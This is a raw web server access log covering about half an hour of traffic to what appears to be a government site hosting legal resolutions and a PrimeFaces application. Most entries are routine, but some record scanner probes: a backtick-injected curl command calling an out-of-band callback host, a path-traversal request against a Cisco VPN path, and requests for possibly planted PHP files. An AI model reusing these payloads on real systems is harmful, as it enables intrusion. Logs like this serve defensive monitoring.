165.154.119.20 - - [28/Feb/2024:00:50:52 -0500] "GET /sitemap.xml HTTP/1.1" 404 1018
190.84.43.161 - - [28/Feb/2024:00:50:53 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
216.244.66.195 - - [28/Feb/2024:00:51:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/1636.pdf HTTP/1.1" 200 1314829
216.244.66.195 - - [28/Feb/2024:00:51:50 -0500] "GET /BLA/resoluciones/AUTOS%202023/0326.pdf HTTP/1.1" 200 464530
201.245.192.253 - - [28/Feb/2024:00:51:54 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [28/Feb/2024:00:52:00 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:00:52:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
201.245.192.253 - - [28/Feb/2024:00:52:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
190.84.43.161 - - [28/Feb/2024:00:52:19 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5525
190.84.43.161 - - [28/Feb/2024:00:52:19 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 200 120550
211.21.37.120 - - [28/Feb/2024:00:52:39 -0500] "\x16\x03\x01" 400 226
216.244.66.195 - - [28/Feb/2024:00:52:41 -0500] "GET /BLA/resoluciones/AUTOS%202023/2613.pdf HTTP/1.1" 200 1081031
216.244.66.195 - - [28/Feb/2024:00:53:31 -0500] "GET /BLA/resoluciones/AUTOS%202023/3331.pdf HTTP/1.1" 200 1304062
201.245.192.253 - - [28/Feb/2024:00:53:54 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:00:54:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [28/Feb/2024:00:54:21 -0500] "GET /BLA/resoluciones/AUTOS%202023/3544.pdf HTTP/1.1" 200 953568
211.21.37.120 - - [28/Feb/2024:00:54:32 -0500] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1022
172.22.2.4 - - [28/Feb/2024:00:53:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
211.21.37.120 - - [28/Feb/2024:00:55:35 -0500] "\x16\x03\x01" 400 226
201.245.192.253 - - [28/Feb/2024:00:55:54 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:00:56:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:00:54:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
211.21.37.120 - - [28/Feb/2024:00:56:54 -0500] "\x16\x03\x01" 400 226
216.245.221.92 - - [28/Feb/2024:00:57:00 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:00:57:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
201.245.192.253 - - [28/Feb/2024:00:57:54 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:00:58:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
186.102.72.119 - - [28/Feb/2024:00:58:27 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+US1txJiRJ+Ar9GIsjpPL5+vcrrHj4PvvDy9dblz0Fp3Yb6/Aon81XeT8WJ+WkLpj9PStRg5gdWjlvbbCtx9tQJGDkhMD1M/atpYQnjp8NI7QLvqq+8xQiYPOVleQWv1H04V/yd50b442FZnCpu9pbWJqH2ccgyN6m1QD/z5YenVUR82MQfrGfKVG0yRKpNSRd45FcJbrtYBDku+CBSN/+23KDXG9kQZEd1sM/nEwG0S53PeKBKjXeI489VPsJCw1WDLAcDQHM/w==&u=U2FsdGVkX1+AXxkrElYpi0sfq4jJc12rcGAEGc5jwwoZDcW3cmZiXpM+UXIre29Y&y=U2FsdGVkX18JmX7a+uta7BURfvJYDqQWK97dOQ9l5pZGGjetofFrefmvwmXpcNUU HTTP/1.1" 200 26
186.102.72.119 - - [28/Feb/2024:00:58:29 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+O2CvAxoCnG2ei1znQIJpjqywRlJSrkheDBoB+9SnhUn1FdF3ZP9fTs7hkRw1052tdrN8NnRAcRDotHeF+VWhGrMTRdafsmbna2SOj237xAwDxaGr8+C0B3M12wUDO1MeqpdFa28iCLmPzSeXFwAbAS1lzpIb1J3DKAjcJ39sV1mZXPpMLqNWtPnEQZX6aUVwN2BvYO8UiitdT7xsju+MivFiy2sZyuJk9L3xIYJhkK3bXm9xhUcyYGmTBfQ8X/cO5rieoq7A50BZDIDAgglxJ8/oClVE7DgFCREQi9aSDKcv5RRxBDnIWdD0BS283l9DcsQRuc6rKZJGSjbfS9eU1pGNJZ5RPMXD3JqNKS4UQWn+oJyayo8U/6Y25tDzetpiMTt1R6T6rdSbGLTVxkLiA5hYN3b8GnEjOgsQ7oLVjS+fzyGcGsCcqqRTFKkSYwkYowFMUKcPrkbLb9s0o6FwbftzADg4SaJ6NuAxhzOKwRfhSBx7aRP6OKHaD0vsftkznzba+fmK7J3DQHZHC+Mv9xUsJiWAGUF+TrQaHHlGMLXa78apczj1LDY5YH07c/QvInwAnFnlNDq/eMA2qYh3gYLqleqhEu5NgkhsLYYMzNmZQKx+oaUO8XVWAprtgzYnGIfFG2Ny0lVs9DNKb/UaLqZ6TStnsZbVzAOQaSJYIWJHkSG10lvhgznLXYy85Wz13CxXRhJ2V+H47bKDrS/S6Vje31Ff8+rlU16///eYapAAZpAZuvUpWRhoC1q2uxfi3+DC73q/aKAWwUAKe8GpbdkJtESQxtjoacrXbU/PTzC6mByw4l+wo/coSHye4bwE02AJQ840kxLq9JomotvWOnq6aYGCPzW/ViSOFHZh87W7wRgbXy0GXFTWxoAsq8SX8ewJopjquHifOi9TIc77Qe2AAq18AcIccqu5J+dvXOQvQUO9FdA16SmWinMNNQmPCmtydV4z9Kidk/UjIVnTcxx01n2zTEAEbNg7FejnU+rhoximwvthf8Rlp8TzlE5CoMucOEkjx0OrBGLlXCq+/C3EgtR6V5I2yvGRrViT3fOo0SEgP3fRngYCxtOqRZ7yWQV8M0dgHoVxDori7c/SSr528iDBWrJfq5VtVu17fKKIwKivy38wSbn5GkE8ApD8+DNef8g00r5UUEhHZWsYwm+ULCBqRkXb8Mf7QA76ePqKWZqo3lMlskofGDn5fGRXSA0B/9YgCpqBnoDmWEmAdgKZc2yfY2v33sBgd3/frPdauAfnQnYaR2YduRJMbo/JRJivc+C39H0m9Iz1UBZqPBTns10egrTGRh+1q+S5hGiueZc1ELGg9&u=U2FsdGVkX1+AXxkrElYpi0sfq4jJc12rcGAEGc5jwwoZDcW3cmZiXpM+UXIre29Y&y=U2FsdGVkX18JmX7a+uta7BURfvJYDqQWK97dOQ9l5pZGGjetofFrefmvwmXpcNUU HTTP/1.1" 200 26
186.102.72.119 - - [28/Feb/2024:00:58:29 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/2I4sRJm6XEr7ACXfWs9UxrpJ7CcaqlsCZPXhAoQz7Fg2U4ku2Tm+SjECaeNE+Hh+G6HWexNf/RwCnyGFHKF7suJ/0IM4zABhv5jL/vnMFm28+3OPMe83z0NwQV/7GBXq25nm3NSnwSYpLHJj2c0/wipzl8EGK95s=&u=U2FsdGVkX1+AXxkrElYpi0sfq4jJc12rcGAEGc5jwwoZDcW3cmZiXpM+UXIre29Y&y=U2FsdGVkX18JmX7a+uta7BURfvJYDqQWK97dOQ9l5pZGGjetofFrefmvwmXpcNUU HTTP/1.1" 200 26
186.102.72.119 - - [28/Feb/2024:00:58:29 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19rlnR3y3TEiwhEwafK/67oLnOlSgqXabNmmyB3tucbKKIuF65tI6XR8D7PHCcjKAMthRECuP/ymMaCUiI9gGkZVsUhBWIN3b7T07AChcA6cyBBJLkPzzNsjC3oqw5zhrIJPkai8bxQpsRHmgU8H/7txcti3wVfqOQ=&u=U2FsdGVkX1+AXxkrElYpi0sfq4jJc12rcGAEGc5jwwoZDcW3cmZiXpM+UXIre29Y&y=U2FsdGVkX18JmX7a+uta7BURfvJYDqQWK97dOQ9l5pZGGjetofFrefmvwmXpcNUU HTTP/1.1" 200 26
186.102.72.119 - - [28/Feb/2024:00:58:30 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19OkBu83eMFMe3867X1JUcwYJBN2TqbpZFUKm6ZngebHodUHRvSsCCnHr+/pNp9cEn9EAl5uHZhbQCzwEGgfBSTU3DrrlDjnnRIEmPzCCe8RmGBqV5otPeVOaCCpnpwKhp/ZEhSwFrC2W7qvMRlwf+9m2S2jqYwh50=&u=U2FsdGVkX1+AXxkrElYpi0sfq4jJc12rcGAEGc5jwwoZDcW3cmZiXpM+UXIre29Y&y=U2FsdGVkX18JmX7a+uta7BURfvJYDqQWK97dOQ9l5pZGGjetofFrefmvwmXpcNUU HTTP/1.1" 200 26
186.102.72.119 - - [28/Feb/2024:00:58:30 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+4EGRGqaK0yypFBIAm+tdRZvdvTv3PkGbRrwCLUHkNh+MXua1aS+TQw/wFnz3UyuOj1eBoT4qBsV76/o0Dm1OPMoFUiCMbBCbQKuzyo/kKB6U5NK6MWVrZ6CpcyzgXZc/2DgIHwlDPXDvRsCEn4D6CdWG+Jlcf7F0icZJ2gheot/2okxq9ilaooLXxEBmRl4323b3CxO/oig==&u=U2FsdGVkX1+AXxkrElYpi0sfq4jJc12rcGAEGc5jwwoZDcW3cmZiXpM+UXIre29Y&y=U2FsdGVkX18JmX7a+uta7BURfvJYDqQWK97dOQ9l5pZGGjetofFrefmvwmXpcNUU HTTP/1.1" 200 26
186.102.72.119 - - [28/Feb/2024:00:58:42 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX19wg2fH5vZz4Y8YzHobd6n2XftOOp11CfOmHpGfPu55qPHEtr7fHzZUkawYx4BMblvKAorSlC5grDvmIOLD6cOkTorQr9khbAaYHmacMTJpFuxy83H5Aa+FWYapma1/OFeZrOzkskhZj6gLpE7LSN/3fhRA24rIsik=&u=U2FsdGVkX1+AXxkrElYpi0sfq4jJc12rcGAEGc5jwwoZDcW3cmZiXpM+UXIre29Y&y=U2FsdGVkX18JmX7a+uta7BURfvJYDqQWK97dOQ9l5pZGGjetofFrefmvwmXpcNUU HTTP/1.1" 200 60
168.119.48.175 - - [28/Feb/2024:00:59:37 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [28/Feb/2024:00:59:54 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:01:00:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.109.49 - - [28/Feb/2024:01:00:26 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202007%2FRES%202007%202501%20AL%202600%2F&order=desc&sort=name HTTP/1.1" 200 26846
47.128.109.49 - - [28/Feb/2024:01:00:27 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
47.128.109.49 - - [28/Feb/2024:01:00:27 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
172.22.2.4 - - [28/Feb/2024:00:59:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
59.127.10.98 - - [28/Feb/2024:01:01:33 -0500] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 404 1035
201.245.192.253 - - [28/Feb/2024:01:01:54 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:01:00:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
216.245.221.92 - - [28/Feb/2024:01:02:00 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:01:01:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
201.245.192.253 - - [28/Feb/2024:01:02:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.20 - - [28/Feb/2024:01:02:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5398.pdf HTTP/1.1" 200 496737
59.127.10.98 - - [28/Feb/2024:01:02:33 -0500] "\x16\x03\x01" 400 226
201.245.192.253 - - [28/Feb/2024:01:03:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:01:04:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
59.127.10.98 - - [28/Feb/2024:01:04:12 -0500] "\x16\x03\x01" 400 226
59.127.10.98 - - [28/Feb/2024:01:04:46 -0500] "GET /upload/userfiles/image/2cwbEgdPfEvG71tvDVL7E48PMQ1.png HTTP/1.1" 404 1022
66.249.66.19 - - [28/Feb/2024:01:05:18 -0500] "GET /Residuos/cosmeticos/files/guia_cosmeticos-aseo.pdf HTTP/1.1" 200 13926317
66.249.66.20 - - [28/Feb/2024:01:05:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2767.pdf HTTP/1.1" 304 -
66.249.66.1 - - [28/Feb/2024:01:05:22 -0500] "GET /bla/resoluciones/resoluciones%202007/res%202007%204001%20al%204100/resolucion%204090%20de%202007.pdf HTTP/1.1" 304 -
66.249.66.20 - - [28/Feb/2024:01:05:25 -0500] "GET /Publicaciones/2023EE290977.pdf HTTP/1.1" 404 228
201.245.192.253 - - [28/Feb/2024:01:05:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
190.158.201.175 - - [28/Feb/2024:01:05:55 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:05:55 -0500] "POST /sipse/faces/presentacion/sistema/reporte/ventanaVerReporteParametros.xhtml HTTP/1.1" 200 39849
190.158.201.175 - - [28/Feb/2024:01:05:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:05:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
59.127.10.98 - - [28/Feb/2024:01:05:59 -0500] "GET /include/makecvs.php?Event=%60curl+http%3a//cneqhp1enjjce7r1g3tgmobwh9uiyhqpk.oast.online+-H+'User-Agent%3a+yCQ5R4'%60 HTTP/1.1" 404 1034
190.158.201.175 - - [28/Feb/2024:01:05:59 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:06:00 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:06:00 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1392
190.158.201.175 - - [28/Feb/2024:01:06:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5262
190.158.201.175 - - [28/Feb/2024:01:06:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 142139
190.158.201.175 - - [28/Feb/2024:01:06:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:06:07 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:06:07 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:06:07 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:06:07 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
201.245.192.253 - - [28/Feb/2024:01:06:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
190.158.201.175 - - [28/Feb/2024:01:06:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:06:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:06:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:06:16 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:06:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:06:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:06:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:06:15 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 188737
190.158.201.175 - - [28/Feb/2024:01:06:16 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:06:16 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
190.158.201.175 - - [28/Feb/2024:01:06:21 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:06:21 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 40470
190.158.201.175 - - [28/Feb/2024:01:06:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:06:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:06:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:06:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:06:25 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:06:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1392
190.158.201.175 - - [28/Feb/2024:01:06:31 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5217
59.127.10.98 - - [28/Feb/2024:01:06:35 -0500] "GET /assets/data/usrimg/2cwbeadzpgnxsujsd07y5dsxmw6.php HTTP/1.1" 404 1034
190.158.201.175 - - [28/Feb/2024:01:06:33 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 142173
190.158.201.175 - - [28/Feb/2024:01:06:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:06:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:06:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:06:38 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:01:06:38 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
172.22.2.4 - - [28/Feb/2024:01:05:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [28/Feb/2024:01:07:00 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:01:06:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
114.32.164.184 - - [28/Feb/2024:01:07:16 -0500] "GET /upload/userfiles/image/2cwbEgdPfEvG71tvDVL7E48PMQ1.png HTTP/1.1" 404 1034
114.32.164.184 - - [28/Feb/2024:01:07:37 -0500] "\x16\x03\x01" 400 226
172.22.2.4 - - [28/Feb/2024:01:06:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
201.245.192.253 - - [28/Feb/2024:01:07:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:01:08:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:01:09:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
190.84.43.161 - - [28/Feb/2024:01:09:58 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 2077904
201.245.192.253 - - [28/Feb/2024:01:10:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:01:11:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:01:11:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
216.245.221.92 - - [28/Feb/2024:01:12:00 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:01:12:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:01:10:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52358
172.22.2.4 - - [28/Feb/2024:01:11:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.11 - - [28/Feb/2024:01:13:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3833.pdf HTTP/1.1" 200 443946
172.22.2.4 - - [28/Feb/2024:01:12:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57485
201.245.192.253 - - [28/Feb/2024:01:13:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:01:14:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:01:15:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
190.84.43.161 - - [28/Feb/2024:01:15:53 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 2231714
190.84.43.161 - - [28/Feb/2024:01:15:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 348
190.84.43.161 - - [28/Feb/2024:01:15:58 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 1984610
201.245.192.253 - - [28/Feb/2024:01:16:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
165.232.102.34 - - [28/Feb/2024:01:16:50 -0500] "\x16\x03\x01\x01\xfd\x01" 400 226
201.245.192.253 - - [28/Feb/2024:01:16:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
216.245.221.92 - - [28/Feb/2024:01:17:00 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:01:17:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
